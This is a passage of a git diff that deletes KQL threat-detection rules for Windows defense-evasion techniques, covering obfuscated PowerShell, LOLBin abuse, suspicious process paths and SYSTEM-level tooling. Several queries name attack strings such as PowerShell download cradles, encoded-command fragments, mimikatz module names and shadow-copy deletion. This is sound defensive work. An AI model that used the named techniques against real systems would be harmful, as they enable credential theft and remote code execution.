Evasion/Suspicious_Network_Connection_Binary_No_CommandLine.kql deleted file mode 100644 index 6b585da4..00000000 --- a/Defense Evasion/Suspicious_Network_Connection_Binary_No_CommandLine.kql +++ /dev/null 
@@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2022/07/03 -// Level: high -// Description: Detects suspicious network connections made by a well-known Windows binary run with no command line parameters -// Tags: attack.defense_evasion -DeviceNetworkEvents -| where ((InitiatingProcessCommandLine endswith "\\regsvr32.exe" or InitiatingProcessCommandLine endswith "\\rundll32.exe" or InitiatingProcessCommandLine endswith "\\dllhost.exe") and (InitiatingProcessFolderPath endswith "\\regsvr32.exe" or InitiatingProcessFolderPath endswith "\\rundll32.exe" or InitiatingProcessFolderPath endswith "\\dllhost.exe")) and (not((InitiatingProcessCommandLine =~ "" or isnull(InitiatingProcessCommandLine)))) \ No newline at end of file diff --git a/Defense Evasion/Suspicious_Obfuscated_PowerShell_Code.kql b/Defense Evasion/Suspicious_Obfuscated_PowerShell_Code.kql deleted file mode 100644 index 9f1cde1d..00000000 --- a/Defense Evasion/Suspicious_Obfuscated_PowerShell_Code.kql +++ /dev/null 
@@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2022/07/11 -// Level: high -// Description: Detects suspicious UTF16 and base64 encoded and often obfuscated PowerShell code often used in command lines -// Tags: attack.defense_evasion -DeviceProcessEvents -| where ProcessCommandLine contains "IAAtAGIAeABvAHIAIAAwAHgA" or ProcessCommandLine contains "AALQBiAHgAbwByACAAMAB4A" or ProcessCommandLine contains "gAC0AYgB4AG8AcgAgADAAeA" or ProcessCommandLine contains "AC4ASQBuAHYAbwBrAGUAKAApACAAfAAg" or ProcessCommandLine contains "AuAEkAbgB2AG8AawBlACgAKQAgAHwAI" or ProcessCommandLine contains "ALgBJAG4AdgBvAGsAZQAoACkAIAB8AC" or ProcessCommandLine contains "AHsAMQB9AHsAMAB9ACIAIAAtAGYAI" or ProcessCommandLine contains "B7ADEAfQB7ADAAfQAiACAALQBmAC" or ProcessCommandLine contains "AewAxAH0AewAwAH0AIgAgAC0AZgAg" or ProcessCommandLine contains "AHsAMAB9AHsAMwB9ACIAIAAtAGYAI" or ProcessCommandLine contains "B7ADAAfQB7ADMAfQAiACAALQBmAC" or ProcessCommandLine contains "AewAwAH0AewAzAH0AIgAgAC0AZgAg" or ProcessCommandLine contains "AHsAMgB9AHsAMAB9ACIAIAAtAGYAI" or ProcessCommandLine contains "B7ADIAfQB7ADAAfQAiACAALQBmAC" or ProcessCommandLine contains "AewAyAH0AewAwAH0AIgAgAC0AZgAg" or ProcessCommandLine contains "AHsAMQB9AHsAMAB9ACcAIAAtAGYAI" or ProcessCommandLine contains "B7ADEAfQB7ADAAfQAnACAALQBmAC" or ProcessCommandLine contains "AewAxAH0AewAwAH0AJwAgAC0AZgAg" or ProcessCommandLine contains "AHsAMAB9AHsAMwB9ACcAIAAtAGYAI" or ProcessCommandLine contains "B7ADAAfQB7ADMAfQAnACAALQBmAC" or ProcessCommandLine contains "AewAwAH0AewAzAH0AJwAgAC0AZgAg" or ProcessCommandLine contains "AHsAMgB9AHsAMAB9ACcAIAAtAGYAI" or ProcessCommandLine contains "B7ADIAfQB7ADAAfQAnACAALQBmAC" or ProcessCommandLine contains "AewAyAH0AewAwAH0AJwAgAC0AZgAg" \ No newline at end of file 
diff --git a/Defense Evasion/Suspicious_PROCEXP152.sys_File_Created_In_TMP.kql b/Defense Evasion/Suspicious_PROCEXP152.sys_File_Created_In_TMP.kql deleted file mode 100644 index 5bad9e78..00000000 --- a/Defense Evasion/Suspicious_PROCEXP152.sys_File_Created_In_TMP.kql +++ /dev/null @@ -1,9 +0,0 @@ -// Author: xknow (@xknow_infosec), xorxes (@xor_xes) -// Date: 2019/04/08 -// Level: medium -// Description: Detects the creation of the PROCEXP152.sys file in the application-data local temporary folder. -This driver is used by Sysinternals Process Explorer but also by KDU (https://github.com/hfiref0x/KDU) or Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs), which uses KDU. - -// Tags: attack.t1562.001, attack.defense_evasion -DeviceFileEvents -| where (FolderPath contains "\\AppData\\Local\\Temp\\" and FolderPath endswith "PROCEXP152.sys") and (not((InitiatingProcessFolderPath contains "\\procexp64.exe" or InitiatingProcessFolderPath contains "\\procexp.exe" or InitiatingProcessFolderPath contains "\\procmon64.exe" or InitiatingProcessFolderPath contains "\\procmon.exe"))) \ No newline at end of file diff --git a/Defense Evasion/Suspicious_Parent_Double_Extension_File_Execution.kql b/Defense Evasion/Suspicious_Parent_Double_Extension_File_Execution.kql deleted file mode 100644 index 3d30e123..00000000 --- a/Defense Evasion/Suspicious_Parent_Double_Extension_File_Execution.kql +++ /dev/null 
@@ -1,7 +0,0 @@ -// Author: frack113, Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/01/06 -// Level: high -// Description: Detect execution of suspicious double extension files in ParentCommandLine -// Tags: attack.defense_evasion, attack.t1036.007 -DeviceProcessEvents -| where (InitiatingProcessFolderPath endswith ".doc.lnk" or InitiatingProcessFolderPath endswith ".docx.lnk" or InitiatingProcessFolderPath endswith ".xls.lnk" or InitiatingProcessFolderPath endswith ".xlsx.lnk" or InitiatingProcessFolderPath endswith ".ppt.lnk" or InitiatingProcessFolderPath endswith ".pptx.lnk" or InitiatingProcessFolderPath endswith ".rtf.lnk" or InitiatingProcessFolderPath endswith ".pdf.lnk" or InitiatingProcessFolderPath endswith ".txt.lnk" or InitiatingProcessFolderPath endswith ".doc.js" or InitiatingProcessFolderPath endswith ".docx.js" or InitiatingProcessFolderPath endswith ".xls.js" or InitiatingProcessFolderPath endswith ".xlsx.js" or InitiatingProcessFolderPath endswith ".ppt.js" or InitiatingProcessFolderPath endswith ".pptx.js" or InitiatingProcessFolderPath endswith ".rtf.js" or InitiatingProcessFolderPath endswith ".pdf.js" or InitiatingProcessFolderPath endswith ".txt.js") or (InitiatingProcessCommandLine contains ".doc.lnk" or InitiatingProcessCommandLine contains ".docx.lnk" or InitiatingProcessCommandLine contains ".xls.lnk" or InitiatingProcessCommandLine contains ".xlsx.lnk" or InitiatingProcessCommandLine contains ".ppt.lnk" or InitiatingProcessCommandLine contains ".pptx.lnk" or InitiatingProcessCommandLine contains ".rtf.lnk" or InitiatingProcessCommandLine contains ".pdf.lnk" or InitiatingProcessCommandLine contains ".txt.lnk" or InitiatingProcessCommandLine contains ".doc.js" or InitiatingProcessCommandLine contains ".docx.js" or InitiatingProcessCommandLine contains ".xls.js" or InitiatingProcessCommandLine contains ".xlsx.js" or InitiatingProcessCommandLine contains ".ppt.js" or InitiatingProcessCommandLine contains ".pptx.js" or 
InitiatingProcessCommandLine contains ".rtf.js" or InitiatingProcessCommandLine contains ".pdf.js" or InitiatingProcessCommandLine contains ".txt.js") \ No newline at end of file diff --git a/Defense Evasion/Suspicious_Path_In_Keyboard_Layout_IME_File_Registry_Value.kql b/Defense Evasion/Suspicious_Path_In_Keyboard_Layout_IME_File_Registry_Value.kql deleted file mode 100644 index 539f1c04..00000000 --- a/Defense Evasion/Suspicious_Path_In_Keyboard_Layout_IME_File_Registry_Value.kql +++ /dev/null @@ -1,10 +0,0 @@ -// Author: X__Junior (Nextron Systems) -// Date: 2023/11/21 -// Level: high -// Description: Detects usage of Windows Input Method Editor (IME) keyboard layout feature, which allows an attacker to load a DLL into the process after sending the WM_INPUTLANGCHANGEREQUEST message. -Before doing this, the client needs to register the DLL in a special registry key that is assumed to implement this keyboard layout. This registry key should store a value named "Ime File" with a DLL path. -IMEs are essential for languages that have more characters than can be represented on a standard keyboard, such as Chinese, Japanese, and Korean. - -// Tags: attack.defense_evasion, attack.t1562.001 -DeviceRegistryEvents -| where (RegistryKey contains "\\Control\\Keyboard Layouts" and RegistryKey contains "Ime File") and ((RegistryValueData contains ":\\Perflogs\\" or RegistryValueData contains ":\\Users\\Public\\" or RegistryValueData contains ":\\Windows\\Temp\\" or RegistryValueData contains "\\AppData\\Local\\Temp\\" or RegistryValueData contains "\\AppData\\Roaming\\" or RegistryValueData contains "\\Temporary Internet") or ((RegistryValueData contains ":\\Users\\" and RegistryValueData contains "\\Favorites\\") or (RegistryValueData contains ":\\Users\\" and RegistryValueData contains "\\Favourites\\") or (RegistryValueData contains ":\\Users\\" and RegistryValueData contains "\\Contacts\\"))) \ No newline at end of file 
diff --git a/Defense Evasion/Suspicious_PowerShell_Invocations_-_Specific_-_ProcessCreation.kql b/Defense Evasion/Suspicious_PowerShell_Invocations_-_Specific_-_ProcessCreation.kql deleted file mode 100644 index aeaaf597..00000000 --- a/Defense Evasion/Suspicious_PowerShell_Invocations_-_Specific_-_ProcessCreation.kql +++ /dev/null 
@@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/01/05 -// Level: medium -// Description: Detects suspicious PowerShell invocation command parameters -// Tags: attack.defense_evasion -DeviceProcessEvents -| where ((ProcessCommandLine contains "-nop" and ProcessCommandLine contains " -w " and ProcessCommandLine contains "hidden" and ProcessCommandLine contains " -c " and ProcessCommandLine contains "[Convert]::FromBase64String") or (ProcessCommandLine contains " -w " and ProcessCommandLine contains "hidden" and ProcessCommandLine contains "-ep" and ProcessCommandLine contains "bypass" and ProcessCommandLine contains "-Enc") or (ProcessCommandLine contains " -w " and ProcessCommandLine contains "hidden" and ProcessCommandLine contains "-noni" and ProcessCommandLine contains "-nop" and ProcessCommandLine contains " -c " and ProcessCommandLine contains "iex" and ProcessCommandLine contains "New-Object") or (ProcessCommandLine contains "iex" and ProcessCommandLine contains "New-Object" and ProcessCommandLine contains "Net.WebClient" and ProcessCommandLine contains ".Download") or (ProcessCommandLine contains "powershell" and ProcessCommandLine contains "reg" and ProcessCommandLine contains "add" and ProcessCommandLine contains "\\software\\") or (ProcessCommandLine contains "bypass" and ProcessCommandLine contains "-noprofile" and ProcessCommandLine contains "-windowstyle" and ProcessCommandLine contains "hidden" and ProcessCommandLine contains "new-object" and ProcessCommandLine contains "system.net.webclient" and ProcessCommandLine contains ".download")) and (not((ProcessCommandLine contains "(New-Object System.Net.WebClient).DownloadString('https://community.chocolatey.org/install.ps1" or ProcessCommandLine contains "Write-ChocolateyWarning"))) \ No newline at end of file 
diff --git a/Defense Evasion/Suspicious_Powercfg_Execution_To_Change_Lock_Screen_Timeout.kql b/Defense Evasion/Suspicious_Powercfg_Execution_To_Change_Lock_Screen_Timeout.kql deleted file mode 100644 index c2209f70..00000000 --- a/Defense Evasion/Suspicious_Powercfg_Execution_To_Change_Lock_Screen_Timeout.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2022/11/18 -// Level: medium -// Description: Detects suspicious execution of 'Powercfg.exe' to change lock screen timeout -// Tags: attack.defense_evasion -DeviceProcessEvents -| where (FolderPath endswith "\\powercfg.exe" or ProcessVersionInfoOriginalFileName =~ "PowerCfg.exe") and ((ProcessCommandLine contains "/setacvalueindex " and ProcessCommandLine contains "SCHEME_CURRENT" and ProcessCommandLine contains "SUB_VIDEO" and ProcessCommandLine contains "VIDEOCONLOCK") or (ProcessCommandLine contains "-change " and ProcessCommandLine contains "-standby-timeout-")) \ No newline at end of file diff --git a/Defense Evasion/Suspicious_Process_Execution_From_Fake_Recycle.Bin_Folder.kql b/Defense Evasion/Suspicious_Process_Execution_From_Fake_Recycle.Bin_Folder.kql deleted file mode 100644 index 317441d1..00000000 --- a/Defense Evasion/Suspicious_Process_Execution_From_Fake_Recycle.Bin_Folder.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: X__Junior (Nextron Systems) -// Date: 2023/07/12 -// Level: high -// Description: Detects process execution from a fake recycle bin folder, often used to avoid security solution. -// Tags: attack.persistence, attack.defense_evasion -DeviceProcessEvents -| where FolderPath contains "RECYCLERS.BIN\\" or FolderPath contains "RECYCLER.BIN\\" \ No newline at end of file diff --git a/Defense Evasion/Suspicious_Process_Parents.kql b/Defense Evasion/Suspicious_Process_Parents.kql deleted file mode 100644 index f2a0aaef..00000000 --- a/Defense Evasion/Suspicious_Process_Parents.kql +++ /dev/null 
@@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2022/03/21 -// Level: high -// Description: Detects suspicious parent processes that should not have any children or should only have a single possible child program -// Tags: attack.defense_evasion, attack.t1036 -DeviceProcessEvents -| where (InitiatingProcessFolderPath endswith "\\minesweeper.exe" or InitiatingProcessFolderPath endswith "\\winver.exe" or InitiatingProcessFolderPath endswith "\\bitsadmin.exe") or ((InitiatingProcessFolderPath endswith "\\csrss.exe" or InitiatingProcessFolderPath endswith "\\certutil.exe" or InitiatingProcessFolderPath endswith "\\eventvwr.exe" or InitiatingProcessFolderPath endswith "\\calc.exe" or InitiatingProcessFolderPath endswith "\\notepad.exe") and (not((isnull(FolderPath) or (FolderPath endswith "\\WerFault.exe" or FolderPath endswith "\\wermgr.exe" or FolderPath endswith "\\conhost.exe" or FolderPath endswith "\\mmc.exe" or FolderPath endswith "\\win32calc.exe" or FolderPath endswith "\\notepad.exe"))))) \ No newline at end of file diff --git a/Defense Evasion/Suspicious_Process_Start_Locations.kql b/Defense Evasion/Suspicious_Process_Start_Locations.kql deleted file mode 100644 index 3bd09343..00000000 --- a/Defense Evasion/Suspicious_Process_Start_Locations.kql +++ /dev/null 
@@ -1,7 +0,0 @@ -// Author: juju4, Jonhnathan Ribeiro, oscd.community -// Date: 2019/01/16 -// Level: medium -// Description: Detects suspicious process run from unusual locations -// Tags: attack.defense_evasion, attack.t1036, car.2013-05-002 -DeviceProcessEvents -| where (FolderPath contains ":\\RECYCLER\\" or FolderPath contains ":\\SystemVolumeInformation\\") or (FolderPath startswith "C:\\Windows\\Tasks\\" or FolderPath startswith "C:\\Windows\\debug\\" or FolderPath startswith "C:\\Windows\\fonts\\" or FolderPath startswith "C:\\Windows\\help\\" or FolderPath startswith "C:\\Windows\\drivers\\" or FolderPath startswith "C:\\Windows\\addins\\" or FolderPath startswith "C:\\Windows\\cursors\\" or FolderPath startswith "C:\\Windows\\system32\\tasks\\") \ No newline at end of file diff --git a/Defense Evasion/Suspicious_Program_Location_Whitelisted_In_Firewall_Via_Netsh.EXE.kql b/Defense Evasion/Suspicious_Program_Location_Whitelisted_In_Firewall_Via_Netsh.EXE.kql deleted file mode 100644 index f47e40f1..00000000 --- a/Defense Evasion/Suspicious_Program_Location_Whitelisted_In_Firewall_Via_Netsh.EXE.kql +++ /dev/null 
@@ -1,7 +0,0 @@ -// Author: Sander Wiebing, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community -// Date: 2020/05/25 -// Level: high -// Description: Detects Netsh command execution that whitelists a program located in a suspicious location in the Windows Firewall -// Tags: attack.defense_evasion, attack.t1562.004 -DeviceProcessEvents -| where ((ProcessCommandLine contains "firewall" and ProcessCommandLine contains "add" and ProcessCommandLine contains "allowedprogram") or (ProcessCommandLine contains "advfirewall" and ProcessCommandLine contains "firewall" and ProcessCommandLine contains "add" and ProcessCommandLine contains "rule" and ProcessCommandLine contains "action=allow" and ProcessCommandLine contains "program=")) and (FolderPath endswith "\\netsh.exe" or ProcessVersionInfoOriginalFileName =~ "netsh.exe") and (ProcessCommandLine contains ":\\$Recycle.bin\\" or ProcessCommandLine contains ":\\RECYCLER.BIN\\" or ProcessCommandLine contains ":\\RECYCLERS.BIN\\" or ProcessCommandLine contains ":\\SystemVolumeInformation\\" or ProcessCommandLine contains ":\\Temp\\" or ProcessCommandLine contains ":\\Users\\Default\\" or ProcessCommandLine contains ":\\Users\\Desktop\\" or ProcessCommandLine contains ":\\Users\\Public\\" or ProcessCommandLine contains ":\\Windows\\addins\\" or ProcessCommandLine contains ":\\Windows\\cursors\\" or ProcessCommandLine contains ":\\Windows\\debug\\" or ProcessCommandLine contains ":\\Windows\\drivers\\" or ProcessCommandLine contains ":\\Windows\\fonts\\" or ProcessCommandLine contains ":\\Windows\\help\\" or ProcessCommandLine contains ":\\Windows\\system32\\tasks\\" or ProcessCommandLine contains ":\\Windows\\Tasks\\" or ProcessCommandLine contains ":\\Windows\\Temp\\" or ProcessCommandLine contains "\\Downloads\\" or ProcessCommandLine contains "\\Local Settings\\Temporary Internet Files\\" or ProcessCommandLine contains "\\Temporary Internet Files\\Content.Outlook\\" or ProcessCommandLine contains "%Public%\\" or 
ProcessCommandLine contains "%TEMP%" or ProcessCommandLine contains "%TMP%") \ No newline at end of file diff --git a/Defense Evasion/Suspicious_Provlaunch.EXE_Child_Process.kql b/Defense Evasion/Suspicious_Provlaunch.EXE_Child_Process.kql deleted file mode 100644 index 85a9b22b..00000000 --- a/Defense Evasion/Suspicious_Provlaunch.EXE_Child_Process.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/08/08 -// Level: high -// Description: Detects suspicious child processes of "provlaunch.exe" which might indicate potential abuse to proxy execution. -// Tags: attack.defense_evasion, attack.t1218 -DeviceProcessEvents -| where ((FolderPath endswith "\\calc.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\notepad.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\wscript.exe") or (FolderPath contains ":\\PerfLogs\\" or FolderPath contains ":\\Temp\\" or FolderPath contains ":\\Users\\Public\\" or FolderPath contains "\\AppData\\Temp\\" or FolderPath contains "\\Windows\\System32\\Tasks\\" or FolderPath contains "\\Windows\\Tasks\\" or FolderPath contains "\\Windows\\Temp\\")) and InitiatingProcessFolderPath endswith "\\provlaunch.exe" \ No newline at end of file diff --git a/Defense Evasion/Suspicious_RASdial_Activity.kql b/Defense Evasion/Suspicious_RASdial_Activity.kql deleted file mode 100644 index 4e30f528..00000000 --- a/Defense Evasion/Suspicious_RASdial_Activity.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: juju4 -// Date: 2019/01/16 -// Level: medium -// Description: Detects suspicious process related to rasdial.exe -// Tags: attack.defense_evasion, attack.execution, attack.t1059 -DeviceProcessEvents -| where FolderPath endswith "rasdial.exe" \ No newline at end of file 
diff --git a/Defense Evasion/Suspicious_Recursive_Takeown.kql b/Defense Evasion/Suspicious_Recursive_Takeown.kql deleted file mode 100644 index 505ce3d4..00000000 --- a/Defense Evasion/Suspicious_Recursive_Takeown.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2022/01/30 -// Level: medium -// Description: Adversaries can interact with the DACLs using built-in Windows commands takeown which can grant adversaries higher permissions on specific files and folders -// Tags: attack.defense_evasion, attack.t1222.001 -DeviceProcessEvents -| where (ProcessCommandLine contains "/f " and ProcessCommandLine contains "/r") and FolderPath endswith "\\takeown.exe" \ No newline at end of file diff --git a/Defense Evasion/Suspicious_Registry_Modification_From_ADS_Via_Regini.EXE.kql b/Defense Evasion/Suspicious_Registry_Modification_From_ADS_Via_Regini.EXE.kql deleted file mode 100644 index e5f98406..00000000 --- a/Defense Evasion/Suspicious_Registry_Modification_From_ADS_Via_Regini.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Eli Salem, Sander Wiebing, oscd.community -// Date: 2020/10/12 -// Level: high -// Description: Detects the import of an alternate data stream with regini.exe, regini.exe can be used to modify registry keys. -// Tags: attack.t1112, attack.defense_evasion -DeviceProcessEvents -| where (FolderPath endswith "\\regini.exe" or ProcessVersionInfoOriginalFileName =~ "REGINI.EXE") and ProcessCommandLine matches regex ":[^ \\\\]" \ No newline at end of file diff --git a/Defense Evasion/Suspicious_Regsvr32_Execution_From_Remote_Share.kql b/Defense Evasion/Suspicious_Regsvr32_Execution_From_Remote_Share.kql deleted file mode 100644 index 57c97c53..00000000 --- a/Defense Evasion/Suspicious_Regsvr32_Execution_From_Remote_Share.kql +++ /dev/null 
@@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/10/31 -// Level: high -// Description: Detects REGSVR32.exe to execute DLL hosted on remote shares -// Tags: attack.defense_evasion, attack.t1218.010 -DeviceProcessEvents -| where ProcessCommandLine contains " \\\\" and (FolderPath endswith "\\regsvr32.exe" or ProcessVersionInfoOriginalFileName =~ "\\REGSVR32.EXE") \ No newline at end of file diff --git a/Defense Evasion/Suspicious_Response_File_Execution_Via_Odbcconf.EXE.kql b/Defense Evasion/Suspicious_Response_File_Execution_Via_Odbcconf.EXE.kql deleted file mode 100644 index 46923deb..00000000 --- a/Defense Evasion/Suspicious_Response_File_Execution_Via_Odbcconf.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/05/22 -// Level: high -// Description: Detects execution of "odbcconf" with the "-f" flag in order to load a response file with a non-".rsp" extension. -// Tags: attack.defense_evasion, attack.t1218.008 -DeviceProcessEvents -| where ((ProcessCommandLine contains " -f " or ProcessCommandLine contains " /f ") and (FolderPath endswith "\\odbcconf.exe" or ProcessVersionInfoOriginalFileName =~ "odbcconf.exe")) and (not((ProcessCommandLine contains ".rsp" or (ProcessCommandLine contains ".exe /E /F \"C:\\WINDOWS\\system32\\odbcconf.tmp\"" and FolderPath =~ "C:\\Windows\\System32\\odbcconf.exe" and InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\runonce.exe")))) \ No newline at end of file diff --git a/Defense Evasion/Suspicious_Rundll32_Activity_Invoking_Sys_File.kql b/Defense Evasion/Suspicious_Rundll32_Activity_Invoking_Sys_File.kql deleted file mode 100644 index 100ed93b..00000000 --- a/Defense Evasion/Suspicious_Rundll32_Activity_Invoking_Sys_File.kql +++ /dev/null 
@@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2021/03/05 -// Level: high -// Description: Detects suspicious process related to rundll32 based on command line that includes a *.sys file as seen being used by UNC2452 -// Tags: attack.defense_evasion, attack.t1218.011 -DeviceProcessEvents -| where ProcessCommandLine contains "rundll32.exe" and (ProcessCommandLine contains ".sys," or ProcessCommandLine contains ".sys ") \ No newline at end of file diff --git a/Defense Evasion/Suspicious_Rundll32_Execution_With_Image_Extension.kql b/Defense Evasion/Suspicious_Rundll32_Execution_With_Image_Extension.kql deleted file mode 100644 index 2167b106..00000000 --- a/Defense Evasion/Suspicious_Rundll32_Execution_With_Image_Extension.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Hieu Tran -// Date: 2023/03/13 -// Level: high -// Description: Detects the execution of Rundll32.exe with DLL files masquerading as image files -// Tags: attack.defense_evasion, attack.t1218.011 -DeviceProcessEvents -| where (ProcessCommandLine contains ".bmp" or ProcessCommandLine contains ".cr2" or ProcessCommandLine contains ".eps" or ProcessCommandLine contains ".gif" or ProcessCommandLine contains ".ico" or ProcessCommandLine contains ".jpeg" or ProcessCommandLine contains ".jpg" or ProcessCommandLine contains ".nef" or ProcessCommandLine contains ".orf" or ProcessCommandLine contains ".png" or ProcessCommandLine contains ".raw" or ProcessCommandLine contains ".sr2" or ProcessCommandLine contains ".tif" or ProcessCommandLine contains ".tiff") and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.exe") \ No newline at end of file diff --git a/Defense Evasion/Suspicious_Rundll32_Invoking_Inline_VBScript.kql b/Defense Evasion/Suspicious_Rundll32_Invoking_Inline_VBScript.kql deleted file mode 100644 index 3d521133..00000000 --- a/Defense Evasion/Suspicious_Rundll32_Invoking_Inline_VBScript.kql +++ /dev/null 
@@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2021/03/05 -// Level: high -// Description: Detects suspicious process related to rundll32 based on command line that invokes inline VBScript as seen being used by UNC2452 -// Tags: attack.defense_evasion, attack.t1055 -DeviceProcessEvents -| where ProcessCommandLine contains "rundll32.exe" and ProcessCommandLine contains "Execute" and ProcessCommandLine contains "RegRead" and ProcessCommandLine contains "window.close" \ No newline at end of file diff --git a/Defense Evasion/Suspicious_Rundll32_Setupapi.dll_Activity.kql b/Defense Evasion/Suspicious_Rundll32_Setupapi.dll_Activity.kql deleted file mode 100644 index c3719d26..00000000 --- a/Defense Evasion/Suspicious_Rundll32_Setupapi.dll_Activity.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Konstantin Grishchenko, oscd.community -// Date: 2020/10/07 -// Level: medium -// Description: setupapi.dll library provide InstallHinfSection function for processing INF files. INF file may contain instructions allowing to create values in the registry, modify files and install drivers. This technique could be used to obtain persistence via modifying one of Run or RunOnce registry keys, run process or use other DLLs chain calls (see references) InstallHinfSection function in setupapi.dll calls runonce.exe executable regardless of actual content of INF file. -// Tags: attack.defense_evasion, attack.t1218.011 -DeviceProcessEvents -| where FolderPath endswith "\\runonce.exe" and (InitiatingProcessCommandLine contains "setupapi.dll" and InitiatingProcessCommandLine contains "InstallHinfSection") and InitiatingProcessFolderPath endswith "\\rundll32.exe" \ No newline at end of file diff --git a/Defense Evasion/Suspicious_Runscripthelper.exe.kql b/Defense Evasion/Suspicious_Runscripthelper.exe.kql deleted file mode 100644 index 568eff5f..00000000 --- a/Defense Evasion/Suspicious_Runscripthelper.exe.kql +++ /dev/null 
@@ -1,7 +0,0 @@ -// Author: Victor Sergeev, oscd.community -// Date: 2020/10/09 -// Level: medium -// Description: Detects execution of powershell scripts via Runscripthelper.exe -// Tags: attack.execution, attack.t1059, attack.defense_evasion, attack.t1202 -DeviceProcessEvents -| where ProcessCommandLine contains "surfacecheck" and FolderPath endswith "\\Runscripthelper.exe" \ No newline at end of file diff --git a/Defense Evasion/Suspicious_SYSTEM_User_Process_Creation.kql b/Defense Evasion/Suspicious_SYSTEM_User_Process_Creation.kql deleted file mode 100644 index 76673450..00000000 --- a/Defense Evasion/Suspicious_SYSTEM_User_Process_Creation.kql +++ /dev/null 
@@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems), David ANDRE (additional keywords) -// Date: 2021/12/20 -// Level: high -// Description: Detects a suspicious process creation as SYSTEM user (suspicious program or command line parameter) -// Tags: attack.credential_access, attack.defense_evasion, attack.privilege_escalation, attack.t1134, attack.t1003, attack.t1027 -DeviceProcessEvents -| where ((ProcessIntegrityLevel =~ "System" and (AccountName contains "AUTHORI" or AccountName contains "AUTORI")) and ((FolderPath endswith "\\calc.exe" or FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\hh.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\forfiles.exe" or FolderPath endswith "\\ping.exe") or (ProcessCommandLine contains " -NoP " or ProcessCommandLine contains " -W Hidden " or ProcessCommandLine contains " -decode " or ProcessCommandLine contains " /decode " or ProcessCommandLine contains " /urlcache " or ProcessCommandLine contains " -urlcache " or (ProcessCommandLine contains " -e" and ProcessCommandLine contains " JAB") or (ProcessCommandLine contains " -e" and ProcessCommandLine contains " SUVYI") or (ProcessCommandLine contains " -e" and ProcessCommandLine contains " SQBFAFgA") or (ProcessCommandLine contains " -e" and ProcessCommandLine contains " aWV4I") or (ProcessCommandLine contains " -e" and ProcessCommandLine contains " IAB") or (ProcessCommandLine contains " -e" and ProcessCommandLine contains " PAA") or (ProcessCommandLine contains " -e" and ProcessCommandLine contains " aQBlAHgA") or ProcessCommandLine contains "vssadmin delete shadows" or ProcessCommandLine contains "reg SAVE HKLM" or ProcessCommandLine contains " -ma " or ProcessCommandLine contains "Microsoft\\Windows\\CurrentVersion\\Run" or ProcessCommandLine contains ".downloadstring(" or ProcessCommandLine contains ".downloadfile(" or ProcessCommandLine contains " /ticket:" or ProcessCommandLine contains "dpapi::" 
or ProcessCommandLine contains "event::clear" or ProcessCommandLine contains "event::drop" or ProcessCommandLine contains "id::modify" or ProcessCommandLine contains "kerberos::" or ProcessCommandLine contains "lsadump::" or ProcessCommandLine contains "misc::" or ProcessCommandLine contains "privilege::" or ProcessCommandLine contains "rpc::" or ProcessCommandLine contains "sekurlsa::" or ProcessCommandLine contains "sid::" or ProcessCommandLine contains "token::" or ProcessCommandLine contains "vault::cred" or ProcessCommandLine contains "vault::list" or ProcessCommandLine contains " p::d " or ProcessCommandLine contains ";iex(" or ProcessCommandLine contains "MiniDump" or ProcessCommandLine contains "net user "))) and (not((InitiatingProcessFolderPath contains ":\\Packages\\Plugins\\Microsoft.GuestConfiguration.ConfigurationforWindows\\" or (ProcessCommandLine contains " -ma " and (FolderPath contains ":\\Program Files (x86)\\Java\\" or FolderPath contains ":\\Program Files\\Java\\") and FolderPath endswith "\\bin\\jp2launcher.exe" and (InitiatingProcessFolderPath contains ":\\Program Files (x86)\\Java\\" or InitiatingProcessFolderPath contains ":\\Program Files\\Java\\") and InitiatingProcessFolderPath endswith "\\bin\\javaws.exe") or ProcessCommandLine =~ "ping 127.0.0.1 -n 5" or (FolderPath endswith "\\PING.EXE" and InitiatingProcessCommandLine contains "\\DismFoDInstall.cmd")))) \ No newline at end of file diff --git a/Defense Evasion/Suspicious_Scheduled_Task_Creation_via_Masqueraded_XML_File.kql b/Defense Evasion/Suspicious_Scheduled_Task_Creation_via_Masqueraded_XML_File.kql deleted file mode 100644 index 55ba5abb..00000000 --- a/Defense Evasion/Suspicious_Scheduled_Task_Creation_via_Masqueraded_XML_File.kql +++ /dev/null 
